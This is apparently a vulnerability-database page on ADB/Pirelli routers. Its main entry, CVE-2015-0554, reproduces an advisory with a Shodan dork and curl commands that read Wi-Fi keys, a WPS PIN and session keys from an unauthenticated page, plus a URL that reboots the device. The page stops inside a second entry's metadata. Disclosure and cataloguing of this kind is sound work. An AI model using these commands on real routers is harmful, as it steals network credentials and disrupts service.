Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
10 vulnerabilities by adb
VAR-201501-0227
Vulnerability from variot - Updated: 2024-02-13 22:34The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar
- Author:
Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
-
Shodan dork :
- "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
-
Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" WLAN_DEAD
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 BSSID: DC:0B:1A:XX:XX:XX
Rebooting the router remotely and provoking a Denial of Service
-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
All the information what we can fetch from.
----------------------------------------------
webs$ ls adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html certadd.html footer.html logo.html routeadd.html stylemain.css certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html colors.css hlppppoeconn.html natcfg2.html scripts util.js config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html css hlptstdns.html omcidownload.html seclogintro.html wancfg.html ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html diag.html images pppoe.html statsadslerr.html wlsecurity.html diagipow.html index.html pradd.html statsadsl.html wlsetup.html diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
-
Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
-
References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
- Timeline:
2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0227",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 1.6,
"vendor": "adb",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n",
"scope": null,
"trust": 0.8,
"vendor": "adb sa",
"version": null
},
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 0.8,
"vendor": "adb sa",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n router pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
},
{
"model": "p.dga4001n pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.3,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adb:p.dga4001n:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported these issues.",
"sources": [
{
"db": "BID",
"id": "72705"
}
],
"trust": 0.3
},
"cve": "CVE-2015-0554",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 9.2,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.4,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-0554",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-00657",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-78500",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-0554",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-78500",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. \nSuccessful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. \nADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:\n\nCVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure \nHomeStation Movistar\n\n- Author:\n\nEduardo Novella @enovella_\nednolo[@]inf.upv[dot]es\n\n- Version:\n\nTested on firmware version PDG_TEF_SP_4.06L.6\n\n\n- Shodan dork : \n\t+ \"Dropbear 0.46 country:es\" ( From now on it looks like not working on this way)\n\n\n- Summary:\n\nHomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any \nIP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. \n\n\n- The vulnerability and the way to exploit it:\n\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"WLAN_\"\n \u003coption value=\u00270\u0027\u003eWLAN_DEAD\u003c/option\u003e\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var wpapskkey\"\nvar wpaPskKey = \u0027IsAklFHhFFui1sr9ZMqD\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var WscDevPin\"\nvar WscDevPin = \u002712820078\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var sessionkey\"\nvar sessionKey=\u00271189641421\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i \"bssid:\" -A 3\n \u003ctd width=\"50\"\u003eBSSID:\u003c/td\u003e\n \u003ctd\u003e\n DC:0B:1A:XX:XX:XX\n \u003c/td\u003e\n\n\n\n# Rebooting the router remotely and provoking a Denial of Service\n#-----------------------------------------------------------------\nhttp://${IP_ADDRESS}/resetrouter.html\n\nWe can observe at the source:\n\u003c!-- hide\n\nvar sessionKey=\u0027846930886\u0027;\nfunction btnReset() {\n var loc = \u0027rebootinfo.cgi?\u0027;\n\n loc += \u0027sessionKey=\u0027 + sessionKey;\n\n var code = \u0027location=\"\u0027 + loc + \u0027\"\u0027;\n eval(code);\n}\n\n// done hiding --\u003e\n\n\nhttp://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123\n\n\n# All the information what we can fetch from. \n#----------------------------------------------\nwebs$ ls\nadslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html\nadslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html\nadslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html\nadslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html\nalgcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html\nAPIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html\natmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html\nbackupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html\nberrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html\nberstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html\nberstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html\ncertadd.html footer.html logo.html routeadd.html stylemain.css\ncertcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html\ncertimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html\ncertloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html\ncfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html\ncfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html\ncfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html\ncfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html\ncfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html\ncolors.css hlppppoeconn.html natcfg2.html scripts util.js\nconfig.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html\ncss hlptstdns.html omcidownload.html seclogintro.html wancfg.html\nddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html\ndefaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html\ndhcpinfo.html html portmapadd.html standby.html wlcfgkey.html\ndiag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html\ndiagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html\ndiag.html images pppoe.html statsadslerr.html wlsecurity.html\ndiagipow.html index.html pradd.html statsadsl.html wlsetup.html\ndiaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html\ndiagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html\ndiagpppoa.html ippcfg.html pwrmngt.html statsatm.html\n\n\n\n+ Conclusion:\n\n\tThis vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network\n or even worse being a member of a botnet without knowledge of it. \n\tFirst mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. \n \n\n\n+ References:\n\nhttp://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html\n\n\n\n+ Timeline:\n\n2013-04-xx Send email to Movistar and Pirelli\n2015-01-05 Full disclosure \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "PACKETSTORM",
"id": "129828"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-78500",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35721",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-0554",
"trust": 3.6
},
{
"db": "PACKETSTORM",
"id": "129828",
"trust": 3.3
},
{
"db": "EXPLOIT-DB",
"id": "35721",
"trust": 2.4
},
{
"db": "BID",
"id": "72705",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "35721",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-78500",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"id": "VAR-201501-0227",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
}
]
},
"last_update_date": "2024-02-13T22:34:44.864000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://broadband.adbglobal.com/"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/129828/pirelli-adsl2-2-wireless-router-p.dga4001n-information-disclosure.html"
},
{
"trust": 2.4,
"url": "http://www.exploit-db.com/exploits/35721"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0554"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0554"
},
{
"trust": 0.3,
"url": "http://broadband.adbglobal.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/35721/"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "http://${ip_address}/resetrouter.html"
},
{
"trust": 0.1,
"url": "http://${ip_address}/rebootinfo.cgi?sessionkey=233665123"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlsecurity.html"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/115663/alpha-networks-adsl2-2-wireless-router-asl-26555-password-disclosure.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0554"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlcfg.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-06T23:51:58",
"db": "PACKETSTORM",
"id": "129828"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-21T18:59:50.917000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-23T20:43:03.387000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB P.DGA4001N Vulnerability in obtaining important information in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.6
}
}
VAR-201807-1046
Vulnerability from variot - Updated: 2023-12-18 13:56All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by the ISP). An attacker would be able to enable the TELNET server or other settings as well. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information may be tampered with. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
